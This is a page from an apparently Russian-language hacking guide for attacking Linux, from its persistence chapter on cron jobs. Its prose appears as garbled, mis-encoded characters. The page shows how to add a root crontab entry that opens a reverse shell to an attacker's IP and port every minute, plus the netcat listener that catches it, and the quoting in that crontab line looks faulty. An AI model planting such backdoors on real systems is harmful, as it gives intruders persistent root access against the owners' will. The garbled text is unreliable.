🍻
Linux under attack
  • ΠŸΡ€Π΅Π΄ΠΈΡΠ»ΠΎΠ²ΠΈΠ΅
  • ОглавлСниС
  • ΠžΠΊΡ€ΡƒΠΆΠ½ΠΈΠ΅
  • Recon
    • 00 - Info
    • 01 - ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ источники
  • SCAN
    • 00 - Info
    • 01 - Π‘ΠΊΠ°Π½ nmap
    • 02 - Π‘ΠΊΠ°Π½ срСдствами OC
    • 03 - ΠžΠ±Ρ„ΡƒΡΠΊΠ°Ρ†ΠΈΡ IP
    • 04 - Π‘ΠΊΠ°Π½ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ сайта
    • 05 - CΠΊΠ°Π½ ΠΏΠΎΠ΄Π΄ΠΎΠΌΠ΅Π½ΠΎΠ²
    • 06 - Π‘ΠΊΠ°Π½ WordPress
  • Vulnerability Analysis
    • 00 - Анализ
  • Exploitation
    • 00 - Info
    • 01 - BruteForce
    • 02 - Local Enumeration
  • Privilege Escalation
    • 00 -Info
    • 01 - Π›ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚Ρ‹
    • 02 - Crack hash
    • 03 - Misconfig
    • 04 - Kernel exploits
  • PERSISTENCE
    • 00 - info
    • 01 - SSH Keys
    • 02 - ПсСвдоROOT Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚
    • 03 - bashrc
    • 04 - Cron Jobs
    • 05 - Systemd
    • 06 - Systemd Timers
    • 07 - rc.local
    • 08 - MOTD
    • 09 - APT
    • 10 - Git hook
    • 11 - Git config
    • 12 - PAM backdoor
  • Π—Π°ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅
Powered by GitBook
On this page
  1. PERSISTENCE

04 - Cron Jobs

Previous03 - bashrcNext05 - Systemd

Last updated 1 year ago

Π‘ΡƒΡ‚ΡŒ Ρ‚Π° ΠΆΠ΅ Ρ‡Ρ‚ΠΎ ΠΈ bashrc, Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π½Π°ΠΌ Π½Π΅ Π½ΡƒΠΆΠ½ΠΎ ΠΆΠ΄Π°Ρ‚ΡŒ ΠΏΠΎΠΊΠ° ΠΊΡ‚ΠΎ Ρ‚ΠΎ залогинится, ΠΌΡ‹ сами выставляСм расписаниС для запуска reverse shell. НапримСр Π·Π°ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌΡ‹ΠΉ хост ΠΎΡ‚Π΄Π°Π²Π°Ρ‚ΡŒ Π½Π°ΠΌ шСлл ΠΊΠ°ΠΆΠ΄ΡƒΡŽ ΠΌΠΈΠ½ΡƒΡ‚Ρƒ.

// ΠŸΡ€Π°Π²ΠΈΠΌ crontab Π½Π° Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌΠΎΠΌ хостС (расписаниС + шСлл)
nano /etc/crontab
* * * * * root /bin/bash -i ">& /dev/tcp/192.168.140.128/9010 0>&1"

// На хостС Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅Π³ΠΎ всС Ρ‚Π°ΠΊ ΠΆΠ΅ запускаСм netcat
nc -lvp 9010

Π§Π΅Ρ€Π΅Π· ΠΌΠΈΠ½ΡƒΡ‚Ρƒ шСлл ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½